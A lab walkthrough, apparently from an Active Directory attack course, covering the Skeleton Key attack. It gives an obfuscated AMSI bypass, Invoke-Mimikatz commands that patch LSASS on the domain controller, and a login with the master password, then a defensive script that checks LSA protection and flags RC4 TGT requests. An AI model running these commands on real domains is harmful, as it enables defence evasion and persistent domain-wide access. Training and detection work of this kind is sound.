Obj 10 Skeleton Key
Task - Use Domain Admin privileges obtained earlier to execute the Skeleton Key attack.
Use this attack with caution! It has the potential to break the DC!
We can simply use the following mimikatz command to execute the attack. Note that the command needs to be run with Domain Admin privileges on the DC, since it patches the LSASS process there. We could also use SafetyKatz or any other tool for the attack. First we need to bypass AMSI and load mimikatz in memory on the DC:
Create a new PSSession to the DC:
PS C:\AD\Tools\Tools> $sess = New-PSSession dcorp-dc.dollarcorp.moneycorp.local

Enter the session:
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess

Run the AMSI bypass script inside the session:
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

From our local machine (after exiting the session) we can load mimikatz into memory on the DC:
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

Now we can enter back into the session and run the attack:
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess

Skeleton Key attack:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'

Now we can log on to any machine as any user. The skeleton key lives only in LSASS memory on the DC, so this persists until the DC is restarted.
Use mimikatz as the password
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> whoami
dcorp-dc\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> exit
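As an added defender-side check for the scenario above (example code, not part of the original lab material), the following PowerShell, run in an elevated session on a DC, reports whether LSA Protection (RunAsPPL) is enabled, which stops unsigned tools such as mimikatz from opening LSASS with the access needed to patch it, and lists recent TGT requests (Event ID 4768) that were issued with RC4 (0x17), the encryption-type downgrade that a skeleton key produces because the injected key only works with RC4. The function names are my own, and 4768 logging assumes the "Audit Kerberos Authentication Service" audit subcategory is enabled.

```powershell
# Added defensive check for this lab's Skeleton Key scenario (not part of the original material).
# Function names are assumptions of this example. Run in an elevated PowerShell session on a DC.

function Test-LsaProtection {
    # RunAsPPL = 1 (or 2 on newer builds) runs LSASS as a protected process, so an unsigned
    # tool cannot obtain the handle it needs to patch Kerberos key handling in memory.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction Stop
    $value = $lsa.RunAsPPL    # $null when the value has never been set
    [pscustomobject]@{
        RunAsPPL  = $value
        Protected = ($null -ne $value -and $value -ge 1)
    }
}

function Get-Rc4TgtRequests {
    param([int]$Hours = 24, [int]$MaxEvents = 5000)
    # Event 4768 = "A Kerberos authentication ticket (TGT) was requested".
    # TicketEncryptionType 0x17 is RC4-HMAC; 0x11 / 0x12 are AES128 / AES256.
    # Successful RC4 TGTs for accounts that normally receive AES tickets are the
    # downgrade pattern to investigate after a suspected skeleton key injection.
    $filter = @{ LogName = 'Security'; Id = 4768; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($d['TicketEncryptionType'] -eq '0x17' -and $d['Status'] -eq '0x0') {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Account = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
                    Client  = $d['IpAddress']
                    EncType = $d['TicketEncryptionType']
                }
            }
        }
}

# Report LSA protection state, then the accounts with the most RC4 TGT issuances.
Test-LsaProtection | Format-List
Get-Rc4TgtRequests -Hours 24 | Group-Object Account | Sort-Object Count -Descending |
    Select-Object Count, Name | Format-Table -AutoSize
```

Accounts whose msDS-SupportedEncryptionTypes permits AES but that suddenly show up with RC4 TGTs are the ones to pull the full 4768/4769 timeline for; a DC restart clears the in-memory patch but not the access that was used to plant it.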